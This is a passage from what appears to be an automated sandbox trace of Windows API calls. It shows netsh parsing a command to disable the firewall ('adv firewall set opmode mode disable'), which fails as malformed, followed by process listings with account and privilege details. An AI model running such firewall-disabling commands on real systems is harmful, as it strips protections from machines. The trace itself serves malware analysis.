_SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0319.885] GetProcessHeap () returned 0x2b30000 [0319.885] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d6b0 [0319.886] GetProcessHeap () returned 0x2b30000 [0319.886] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3dd18 [0319.886] wcscpy_s (in: _Destination=0x2b3dd18, _SizeInWords=0x4, _Source="adv" | out: _Destination="adv") returned 0x0 [0319.886] GetProcessHeap () returned 0x2b30000 [0319.886] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d818 [0319.886] GetProcessHeap () returned 0x2b30000 [0319.886] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x12) returned 0x2b5a778 [0319.886] wcscpy_s (in: _Destination=0x2b5a778, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0319.886] GetProcessHeap () returned 0x2b30000 [0319.886] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d710 [0319.886] GetProcessHeap () returned 0x2b30000 [0319.886] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3dcc8 [0319.886] wcscpy_s (in: _Destination=0x2b3dcc8, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0319.886] GetProcessHeap () returned 0x2b30000 [0319.887] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d6c8 [0319.887] GetProcessHeap () returned 0x2b30000 [0319.887] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xe) returned 0x2b6d878 [0319.887] wcscpy_s (in: _Destination=0x2b6d878, _SizeInWords=0x7, _Source="opmode" | out: _Destination="opmode") returned 0x0 [0319.887] GetProcessHeap () returned 0x2b30000 [0319.887] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d7b8 [0319.887] GetProcessHeap () returned 0x2b30000 [0319.887] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xa) returned 0x2b6d8d8 [0319.887] wcscpy_s (in: _Destination=0x2b6d8d8, _SizeInWords=0x5, _Source="mode" | out: _Destination="mode") returned 0x0 [0319.887] GetProcessHeap () returned 0x2b30000 [0319.887] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d6e0 [0319.887] GetProcessHeap () returned 0x2b30000 [0319.887] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x10) returned 0x2b6d7d0 [0319.887] wcscpy_s (in: _Destination=0x2b6d7d0, _SizeInWords=0x8, _Source="disable" | out: _Destination="disable") returned 0x0 [0319.887] GetProcessHeap () returned 0x2b30000 [0319.888] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b63d08) returned 1 [0319.888] GetProcessHeap () returned 0x2b30000 [0319.888] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d800) returned 1 [0319.888] GetProcessHeap () returned 0x2b30000 [0319.888] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b3dd18) returned 1 [0319.888] GetProcessHeap () returned 0x2b30000 [0319.888] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x18) returned 0x2b5a878 [0319.888] lstrcmpiW (lpString1="advfirewall", lpString2="routing") returned -1 [0319.888] lstrcmpiW (lpString1="advfirewall", lpString2="ip") returned -1 [0319.888] lstrcmpiW (lpString1="advfirewall", lpString2="ipv6") returned -1 [0319.888] lstrcmpiW (lpString1="advfirewall", lpString2="aaaa") returned 1 [0319.888] lstrcmpiW (lpString1="advfirewall", lpString2="ras") returned -1 [0319.889] _wcsnicmp (_String1="firewall", _String2="dump", _MaxCount=0x8) returned 2 [0319.889] _wcsnicmp (_String1="firewall", _String2="help", _MaxCount=0x8) returned -2 [0319.889] _wcsnicmp (_String1="firewall", _String2="?", _MaxCount=0x8) returned 39 [0319.890] _wcsnicmp (_String1="firewall", _String2="reset", _MaxCount=0x8) returned -12 [0319.890] _wcsnicmp (_String1="firewall", _String2="import", _MaxCount=0x8) returned -3 [0319.890] _wcsnicmp (_String1="firewall", _String2="export", _MaxCount=0x8) returned 1 [0319.890] _wcsnicmp (_String1="firewall", _String2="consec", _MaxCount=0x8) returned 3 [0319.890] _wcsnicmp (_String1="firewall", _String2="firewall", _MaxCount=0x8) returned 0 [0319.890] GetProcessHeap () returned 0x2b30000 [0319.890] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d800 [0319.890] GetProcessHeap () returned 0x2b30000 [0319.890] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d890 [0319.890] GetProcessHeap () returned 0x2b30000 [0319.890] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x66) returned 0x2b63d08 [0319.890] GetProcessHeap () returned 0x2b30000 [0319.890] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d8a8 [0319.890] GetProcessHeap () returned 0x2b30000 [0319.890] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d8f0 [0319.891] wcscpy_s (in: _Destination=0x2b6d8f0, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0319.891] GetProcessHeap () returned 0x2b30000 [0319.891] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d908 [0319.891] GetProcessHeap () returned 0x2b30000 [0319.891] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x18) returned 0x2b5a578 [0319.891] wcscpy_s (in: _Destination=0x2b5a578, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0319.891] GetProcessHeap () returned 0x2b30000 [0319.891] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d998 [0319.891] GetProcessHeap () returned 0x2b30000 [0319.891] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x12) returned 0x2b5a7f8 [0319.891] wcscpy_s (in: _Destination=0x2b5a7f8, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0319.891] GetProcessHeap () returned 0x2b30000 [0319.891] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d9b0 [0319.891] GetProcessHeap () returned 0x2b30000 [0319.892] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3dd18 [0319.892] wcscpy_s (in: _Destination=0x2b3dd18, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0319.892] GetProcessHeap () returned 0x2b30000 [0319.892] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d980 [0319.892] GetProcessHeap () returned 0x2b30000 [0319.892] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xe) returned 0x2b6d9c8 [0319.892] wcscpy_s (in: _Destination=0x2b6d9c8, _SizeInWords=0x7, _Source="opmode" | out: _Destination="opmode") returned 0x0 [0319.892] GetProcessHeap () returned 0x2b30000 [0319.892] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d938 [0319.892] GetProcessHeap () returned 0x2b30000 [0319.892] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xa) returned 0x2b6d9f8 [0319.892] wcscpy_s (in: _Destination=0x2b6d9f8, _SizeInWords=0x5, _Source="mode" | out: _Destination="mode") returned 0x0 [0319.892] GetProcessHeap () returned 0x2b30000 [0319.892] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0xc) returned 0x2b6d950 [0319.892] GetProcessHeap () returned 0x2b30000 [0319.892] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x10) returned 0x2b6d9e0 [0319.893] wcscpy_s (in: _Destination=0x2b6d9e0, _SizeInWords=0x8, _Source="disable" | out: _Destination="disable") returned 0x0 [0319.893] GetProcessHeap () returned 0x2b30000 [0319.893] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b63d08) returned 1 [0319.893] GetProcessHeap () returned 0x2b30000 [0319.893] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d890) returned 1 [0319.893] GetProcessHeap () returned 0x2b30000 [0319.893] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b5a7f8) returned 1 [0319.893] GetProcessHeap () returned 0x2b30000 [0319.893] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x12) returned 0x2b5a5b8 [0319.893] lstrcmpiW (lpString1="firewall", lpString2="routing") returned -1 [0319.893] lstrcmpiW (lpString1="firewall", lpString2="ip") returned -1 [0319.893] lstrcmpiW (lpString1="firewall", lpString2="ipv6") returned -1 [0319.893] lstrcmpiW (lpString1="firewall", lpString2="aaaa") returned 1 [0319.893] lstrcmpiW (lpString1="firewall", lpString2="ras") returned -1 [0319.894] _wcsnicmp (_String1="set", _String2="dum", _MaxCount=0x3) returned 15 [0319.894] _wcsnicmp (_String1="set", _String2="hel", _MaxCount=0x3) returned 11 [0319.894] _wcsnicmp (_String1="set", _String2="?", _MaxCount=0x3) returned 52 [0319.894] _wcsnicmp (_String1="set", _String2="add", _MaxCount=0x3) returned 18 [0319.894] _wcsnicmp (_String1="set", _String2="del", _MaxCount=0x3) returned 15 [0319.894] _wcsnicmp (_String1="set", _String2="set", _MaxCount=0x3) returned 0 [0319.894] _wcsnicmp (_String1="opmode", _String2="help", _MaxCount=0x6) returned 7 [0319.894] _wcsnicmp (_String1="opmode", _String2="?", _MaxCount=0x6) returned 48 [0319.894] wcstok (in: _String="rule", _Delimiter=" ", _Context=0x2b68988 | out: _String="rule", _Context=0x2b68988) returned="rule" [0319.894] _wcsnicmp (_String1="opmode", _String2="rule", _MaxCount=0x6) returned -3 [0319.894] GetProcessHeap () returned 0x2b30000 [0319.894] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d638) returned 1 [0319.894] GetProcessHeap () returned 0x2b30000 [0319.894] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b3dc68) returned 1 [0319.894] GetProcessHeap () returned 0x2b30000 [0319.895] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b5a698) returned 1 [0319.895] GetProcessHeap () returned 0x2b30000 [0319.895] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b3dcb8) returned 1 [0319.895] GetProcessHeap () returned 0x2b30000 [0319.895] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d728) returned 1 [0319.895] GetProcessHeap () returned 0x2b30000 [0319.895] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d680) returned 1 [0319.895] GetProcessHeap () returned 0x2b30000 [0319.895] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d650) returned 1 [0319.895] GetProcessHeap () returned 0x2b30000 [0319.895] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b57b08) returned 1 [0319.896] LoadStringW (in: hInstance=0x0, uID=0x3a9c, lpBuffer=0x38f948, cchBufferMax=16384 | out: lpBuffer="The following command was not found: %1!s!.\n") returned 0x2c [0319.897] FormatMessageW (in: dwFlags=0x500, lpSource=0x38f948, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x38f92c, nSize=0x0, Arguments=0x38f944 | out: lpBuffer="﬘ʶ祐9胃\x92悘Ѻퟨʶ") returned 0x4c [0319.897] GetStdHandle (nStdHandle=0xfffffff5) returned 0x648 [0319.897] GetConsoleOutputCP () returned 0x1b5 [0320.222] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The following command was not found: adv firewall set opmode mode disable.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 77 [0320.223] GetProcessHeap () returned 0x2b30000 [0320.223] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x4d) returned 0x2b6d398 [0320.223] GetConsoleOutputCP () returned 0x1b5 [0320.371] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The following command was not found: adv firewall set opmode mode disable.\r\n", cchWideChar=-1, lpMultiByteStr=0x2b6d398, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The following command was not found: adv firewall set opmode mode disable.\r\n", lpUsedDefaultChar=0x0) returned 77 [0320.371] WriteFile (in: hFile=0x648, lpBuffer=0x2b6d398*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x38f918, lpOverlapped=0x0 | out: lpBuffer=0x2b6d398*, lpNumberOfBytesWritten=0x38f918*=0x4c, lpOverlapped=0x0) returned 1 [0320.371] GetProcessHeap () returned 0x2b30000 [0320.371] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d398) returned 1 [0320.371] LocalFree (hMem=0x2b6fb18) returned 0x0 [0320.371] free (_Block=0x47a6098) [0320.371] GetProcessHeap () returned 0x2b30000 [0320.371] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b3dc08) returned 1 [0320.371] GetProcessHeap () returned 0x2b30000 [0320.371] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d770) returned 1 [0320.371] GetProcessHeap () returned 0x2b30000 [0320.371] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b5a638) returned 1 [0320.372] GetProcessHeap () returned 0x2b30000 [0320.372] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d740) returned 1 [0320.372] GetProcessHeap () returned 0x2b30000 [0320.372] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b3dca8) returned 1 [0320.372] GetProcessHeap () returned 0x2b30000 [0320.372] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d698) returned 1 [0320.372] GetProcessHeap () returned 0x2b30000 [0320.372] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d758) returned 1 [0320.372] GetProcessHeap () returned 0x2b30000 [0320.372] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d830) returned 1 [0320.372] GetProcessHeap () returned 0x2b30000 [0320.372] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d920) returned 1 [0320.372] GetProcessHeap () returned 0x2b30000 [0320.372] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d6f8) returned 1 [0320.373] GetProcessHeap () returned 0x2b30000 [0320.373] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d860) returned 1 [0320.373] GetProcessHeap () returned 0x2b30000 [0320.374] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d788) returned 1 [0320.374] GetProcessHeap () returned 0x2b30000 [0320.374] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d7e8) returned 1 [0320.374] GetProcessHeap () returned 0x2b30000 [0320.374] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b6d8c0) returned 1 [0320.374] GetProcessHeap () returned 0x2b30000 [0320.374] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b63ef0) returned 1 [0320.374] GetProcessHeap () returned 0x2b30000 [0320.374] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b63ec0) returned 1 [0320.677] GetProcessHeap () returned 0x2b30000 [0320.677] RtlFreeHeap (HeapHandle=0x2b30000, Flags=0x0, BaseAddress=0x2b64228) returned 1 [0320.677] FreeLibrary (hLibModule=0x920000) returned 1 [0320.677] FreeLibrary (hLibModule=0x6fdf0000) returned 1 [0320.680] FreeLibrary (hLibModule=0x6fd20000) returned 1 [0320.698] free (_Block=0x2a53938) [0320.699] LocalFree (hMem=0x2b48d90) returned 0x0 [0320.699] LocalFree (hMem=0x2b48f10) returned 0x0 [0320.699] LocalFree (hMem=0x2b487d8) returned 0x0 [0320.699] LocalFree (hMem=0x2b46240) returned 0x0 [0320.700] LocalAlloc (uFlags=0x40, uBytes=0x178) returned 0x2b68db0 [0320.700] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x2b6d920 [0320.700] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2b6d8c0 [0320.700] free (_Block=0x2a511c0) [0320.700] free (_Block=0x0) [0320.700] free (_Block=0x2a511a8) [0320.700] free (_Block=0x2a538d0) [0320.701] free (_Block=0x2a53918) [0320.702] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x2b63d08 [0320.706] LocalFree (hMem=0x2b63d08) returned 0x0 [0320.706] LocalFree (hMem=0x2b48fa0) returned 0x0 [0320.706] LocalFree (hMem=0x2b68db0) returned 0x0 [0320.707] free (_Block=0x2a510a0) [0320.708] GetModuleHandleA (lpModuleName="MSVCRT.DLL") returned 0x74f40000 [0320.708] FreeLibrary (hLibModule=0x74f40000) returned 1 [0320.708] LocalFree (hMem=0x2b6d8c0) returned 0x0 [0320.708] LocalFree (hMem=0x2b6d920) returned 0x0 [0320.709] GlobalHandle (pMem=0x2b48c80) returned 0x890004 [0320.709] GlobalUnlock (hMem=0x890004) returned 0 [0320.820] FreeLibrary (hLibModule=0x6fb80000) returned 1 [0320.829] FreeLibrary (hLibModule=0x6fab0000) returned 1 [0320.833] FreeLibrary (hLibModule=0x6fa90000) returned 1 [0320.854] FreeLibrary (hLibModule=0x6f9a0000) returned 1 [0320.857] FreeLibrary (hLibModule=0x6f990000) returned 1 [0321.404] FreeLibrary (hLibModule=0x6f6b0000) returned 1 [0321.415] FreeLibrary (hLibModule=0x6f6a0000) returned 1 [0321.417] FreeLibrary (hLibModule=0x6f620000) Thread: id = 307 os_tid = 0x117c Thread: id = 314 os_tid = 0xcd8 Thread: id = 347 os_tid = 0xfe0 [0320.665] LocalAlloc (uFlags=0x40, uBytes=0x178) returned 0x2b68db0 [0320.665] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x2b6d650 [0320.666] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2b6d920 [0320.666] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x2b63d08 [0320.666] LocalReAlloc (hMem=0x2b6d920, uBytes=0x10, uFlags=0x2) returned 0x2b68f30 [0320.668] LocalFree (hMem=0x2b68db0) returned 0x0 [0320.668] LocalFree (hMem=0x2b63d08) returned 0x0 [0320.668] LocalFree (hMem=0x2b68f30) returned 0x0 [0320.668] LocalFree (hMem=0x2b6d650) returned 0x0 Thread: id = 353 os_tid = 0xe18 Thread: id = 356 os_tid = 0xe38 Process: id = "26" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x64cba000" os_pid = "0x1390" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x9a8" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 300 os_tid = 0xee4 Thread: id = 301 os_tid = 0xedc Thread: id = 302 os_tid = 0xf00 Thread: id = 303 os_tid = 0xf14 Process: id = "27" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x20fe0000" os_pid = "0xd78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "20" os_parent_pid = "0x2ac" cmd_line = "C:\\WINDOWS\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 315 os_tid = 0xdd4 Thread: id = 316 os_tid = 0x1170 Thread: id = 317 os_tid = 0x116c Thread: id = 318 os_tid = 0x12e4 Thread: id = 319 os_tid = 0x1174 Thread: id = 320 os_tid = 0xd60 Thread: id = 321 os_tid = 0x630 Process: id = "28" image_name = "sihost.exe" filename = "c:\\windows\\system32\\sihost.exe" page_root = "0x48c54000" os_pid = "0x700" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "20" os_parent_pid = "0x3b4" cmd_line = "sihost.exe" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 322 os_tid = 0xb34 Thread: id = 323 os_tid = 0xb30 Thread: id = 324 os_tid = 0x9f4 Thread: id = 325 os_tid = 0x9f0 Thread: id = 326 os_tid = 0x9d4 Thread: id = 327 os_tid = 0x934 Thread: id = 328 os_tid = 0x918 Thread: id = 329 os_tid = 0x608 Thread: id = 330 os_tid = 0x7ac Thread: id = 331 os_tid = 0x758 Thread: id = 332 os_tid = 0x730 Thread: id = 333 os_tid = 0x72c Thread: id = 334 os_tid = 0x704 Thread: id = 335 os_tid = 0x1394 Thread: id = 336 os_tid = 0x102c Thread: id = 337 os_tid = 0x13d0 Thread: id = 338 os_tid = 0xec8 Process: id = "29" image_name = "applicationframehost.exe" filename = "c:\\windows\\system32\\applicationframehost.exe" page_root = "0x26261000" os_pid = "0x1218" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "22" os_parent_pid = "0x2ac" cmd_line = "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 339 os_tid = 0x139c Thread: id = 340 os_tid = 0x13cc Thread: id = 341 os_tid = 0x1274 Thread: id = 342 os_tid = 0x1278 Thread: id = 343 os_tid = 0x1384 Thread: id = 344 os_tid = 0x1074 Thread: id = 345 os_tid = 0x1304 Thread: id = 346 os_tid = 0x13e4 Thread: id = 348 os_tid = 0x107c Thread: id = 349 os_tid = 0x364 Thread: id = 350 os_tid = 0xe30 Thread: id = 351 os_tid = 0xe20 Thread: id = 352 os_tid = 0x10dc Thread: id = 354 os_tid = 0xe24